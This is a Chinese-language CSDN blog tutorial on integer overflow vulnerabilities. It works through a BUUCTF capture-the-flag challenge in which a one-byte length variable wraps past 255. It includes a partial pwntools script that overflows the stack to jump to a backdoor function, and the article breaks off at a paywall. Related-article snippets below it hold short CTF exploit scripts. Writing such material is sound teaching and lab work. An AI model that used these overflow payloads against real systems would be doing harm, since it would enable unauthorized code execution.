二进制漏洞原理--整型溢出漏洞

最新推荐文章于 2022-05-20 23:08:34 发布
最新推荐文章于 2022-05-20 23:08:34 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: 二进制 文章标签: 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40410406/article/details/109671571
版权
本文深入探讨了整型溢出漏洞,包括有符号和无符号整数溢出的情况。重点关注基于栈和堆的整型溢出实例,通过具体例子解释了如何利用这种漏洞。在栈溢出中,通过控制输入长度来改变变量值,而在堆溢出中,溢出导致错误的堆块大小分配,从而影响堆管理结构。
摘要由CSDN通过智能技术生成

整型溢出

整数分为有符号和无符号两类,有符号数以最高位作为符号位,正整数最高位为1,负整数最高位为0,不同类型的整数在内存中有不同的取值范围,unsigned int = 4字节,int = 4字节,当存储的数值超过该类型整数的最大值就会发生溢出。

在一些有符号和无符号转换的过程中最有可能发生整数溢出漏洞。

请添加图片描述
在这里插入图片描述

基于栈的整型溢出

以例子来说明

例1:基于栈的整型溢出利用

https://buuoj.cn/challenges#[BJDCTF%202nd]r2t3

图中的字节应该改为字长

在这里插入图片描述
04931856.png)]

v3的字节长度为1 ,所以取值为0-2^8也就是0-255

当v3的取值大于255发生整型溢出时,v3=256实际上时v3=0,v3=257时实际上是v3=1,依次类推。

此题中v3的值是我们输入的buf字符串,后面的if语句会判断它的值,如果在4-8之间才会执行下面的return语句将我们输入的字符传给dest

所以我们将输入的字符长度设置为长度为260-264之间就可以。

dest距离ebp17个字节,所以我们需要在输入的第17+4=21个字节开始输入后门函数的地址,之后再补全字符到长度为260-264之间即可。

脚本如下:

from pwn import *
io=remote('node3.buuoj.cn',25414)
elf=ELF('./r2t3')

system = 0x804858b
payload = (cyclic(17+4)+p32(system)).ljust(262,b'a'</
最低0.47元/天 解锁文章
夏天的知了
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
整数溢出漏洞危害和预防
JinxMow的博客
12-17 2360
智能合约作为区块链2.0的代表技术,适应于区块链去中心化、分布式的特点, 具有独立运行、不可篡改的优良特性,可用于实现包含金融工具在内的各类分布式应用。开发者可以自行定义交易逻辑并开发代码发布到链上,合约代码在矿工节点的虚拟机环境(如EVM)中执行。合约交易被打包进区块后,链上节点执行相同代码,从而同步改变链上数据状态。故合约的多方参与者无需建立信任,也无法相互欺骗。 合约运行在区块链节点中,具有...
智能合约漏洞整型溢出
最新发布
qq_40015778的博客
02-20 904
智能合约漏洞整型溢出
【软件与系统安全】整数溢出、格式化字符串、数组越界访问漏洞
kkzzjx
05-20 1394
文章目录一、整数溢出整数表示举例防护二、格式化字符串漏洞三、数组越界访问漏洞产生举例 一、整数溢出 整数表示 原码、反码、补码表示: 对于正数原码、反码以及补码是其本身。负数的原码是其本身,反码是对原码除符号位之外的各位取反,补码则是反码加1。 CF是无符号溢出标志,OF是有符号溢出标志。即使有符号数相加/相减导致了CF=1也没什么意义,不能说明结果的正确与否。此时,OF=1,则说明结果溢出,出现错误;OF=0,说明结果正确。这个过程根本和CF没关系,CF=1/0,都不会影响。 这说明指针类型不同,对
整数溢出
wuxiaobingandbob的专栏
11-20 5549
http://blog.csdn.net/habla/article/details/1834658 整数溢出也是一种常见的软件漏洞,由此引发的bug可能比格式化字符串缺陷和缓冲区溢出缺陷更难于发现。前几天solaris系统中就爆出被人发现了一个整数溢出漏洞。在这里我们来翻译phrack杂志上的一篇关于整数溢出的文章,写得相当详细。平时时间不是很多,所以我不会一次把这篇文章全部翻译后才b
Redis整形溢出漏洞(CVE-2021-32761)及修复脚本
淡定波的博客
07-23 4513
一、漏洞情况说明 Redis整形溢出漏洞(CVE-2021-32761): Redis是世界范围内应用广泛的内存型高速键值对数据库。 攻击者通过BIT命令与proto-max-bulk-len配置参数结合的情况下,可攻击运行在32位的系统中的32位的Redis程序,该漏洞能够造成整形溢出,并最终导致远程代码执行。 二、影响范围 Redis整形溢出漏洞影响版本: 2.2 < Redis Redis < 5.0.13 2.2 < Redis Redis < 6.0.15 2.2 <
二进制漏洞挖掘-栈溢出-开启Canary1
08-04
溢出漏洞是一种常见的二进制漏洞,发生在程序对栈缓冲区进行写操作时,未对缓冲区大小进行判断,导致写入数据长度可能大于缓冲区长度。攻击者可以通过溢出栈缓冲区,覆盖栈上保存的函数返回地址,达到劫持程序执行...
二进制漏洞挖掘-栈溢出-开启FORTIFY1
08-04
在这里,我们将重点讨论栈溢出漏洞,并且展示如何使用FORTIFY来防止这种漏洞。 栈溢出漏洞是指在栈缓冲区中写入数据时,未对缓冲区大小进行判断,导致写入数据长度可能大于缓冲区长度。这将导致栈溢出,攻击者可以...
二进制漏洞挖掘-栈溢出-开启RELRO1
08-04
通过使用这些选项,开发者可以在编译时增加二进制文件的安全性,防止栈溢出漏洞被利用来执行恶意代码。 在进行二进制漏洞挖掘时,了解如何开启和利用 RELRO 是至关重要的。它可以帮助防御者提高系统的安全性,同时...
二进制漏洞挖掘-栈溢出-开启PIE1
08-04
第二次运行: 第三次运行: 第二步是通过第一步计算得到的程序加载基址计算出 puts 函数对应 puts@plt、got.plt 的 第三步是通过第二步泄露出的
二进制漏洞挖掘-栈溢出-开启NX开启ASLR1
08-04
二进制漏洞挖掘是网络安全领域中的重要技能,主要涉及到对软件二进制代码的分析,以发现潜在的安全问题。在本篇文章中,我们将探讨一种常见的漏洞类型——栈溢出,并结合NX(No eXecute)和ASLR(Address Space Layout ...
漏洞分析——二进制漏洞
sxr__nc的博客
01-10 4902
二进制漏洞:传统的缓冲区溢出、UAF(Use-After-Free)等涉及二进制编码的漏洞统称为二进制漏洞 根据缓冲区所处的不同内存空间以及分配方式的不同,缓冲区溢出可以分为栈溢出和堆溢出溢出原理: 栈是一种基本的数据结构,是由编译器自动进行分配、释放的。栈遵循先进后出的规则,生长方向为从高向低生长,也就是地址由高到低 栈中存放的数据:对于要调用的子函数来说,存放子函数的参数、返回地址、局部变...
二进制各种漏洞原理实战分析总结
hhd1988的专栏
10-27 3288
二进制各种漏洞原理实战分析总结 0x01栈溢出漏洞原理 0x02 堆溢出漏洞原理 0x03 堆调试技巧 堆尾检查 页堆 0x04整数溢出漏洞原理 基于栈的整数溢出 ...
BUUCTF-PWN刷题日记(一)
weixin_45461609的博客
04-30 1280
BUUCTF-PWN刷题日记rip rip 简单的栈溢出 #coding=utf-8 from pwn import* #r = process('./pwn1') r = remote('node3.buuoj.cn',26123) sys_addr = 0x401186 #address of fun payload = 'a'*(0xf+8) + p64(sys_addr) r.sendli...
BUUCTF PWN 1-20
2h4ox1n9
12-03 361
1、test_your_nc from pwn import * io=remote("node3.buuoj.cn",27916) io.interactive() 之后ls , cat flag 白给
二进制漏洞利用原理--栈溢出
网络安全研究
12-28 750
函数的局部变量在栈中一个挨着一个排列。如果这些局部变量中有数组之类的缓冲区,并且程序中存在数组越界的缺陷,那么越界的数组元素就有可能破坏栈中相邻变量的值,甚至破坏栈帧中所保存的EBP值、返回地址等重要数据。
原理】Basic Integer Overflows
FreeXploiT
03-30 1687
Basic Integer Overflows创建时间:2002-12-31文章属性:转载文章提交:xundi (xundi_at_xfocus.org)Volume 0x0b, Issue 0x3c, Phile #0x0a of 0x10|=--------------------=[ Basic Integer Overflows ]=----------------------=||=--
漏洞学习笔记——栈和整数溢出原理
谈成(C/C++)
04-15 554
1.栈溢出原理溢出之所以可以修改EIP,是利用局部变量和返回地址是同时保存在栈中的。 当调用call命令时,会将下一条指令的地址push到栈中,然后进入call函数。 而在call函数中,局部变量也会继续在同一个栈中保存。所以当复制字符串时,就有可能向下溢出,将返回地址给覆盖了。这就导致retn时,将被覆盖的返回地址pop到EIP中执行。 2.整数溢出原理 整数溢出其实是利用了整数存在上限的问题。比如一个USHORT类型的数据,他的上限就是65535,当你给他输入65536..
逆向之整数溢出漏洞
菜鸟-传奇
04-26 470
逆向之整数溢出漏洞 溢出漏洞的简介 溢出漏洞的概念:   溢出是黑客利用程序的漏洞,专门开发的一种程序,加相应的参数运行后,就可以达到某种目的。溢出是程序设计者设计时的不足所带来的错误 溢出的类型:   溢出分为缓冲区溢出、 内存溢出、数据溢出整数的概念 整数的分类:   在计算机中,整数分为无符号整数以及有符号整数两种 数据在计算机中的存储方式:   数据在计算机中的存储方...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值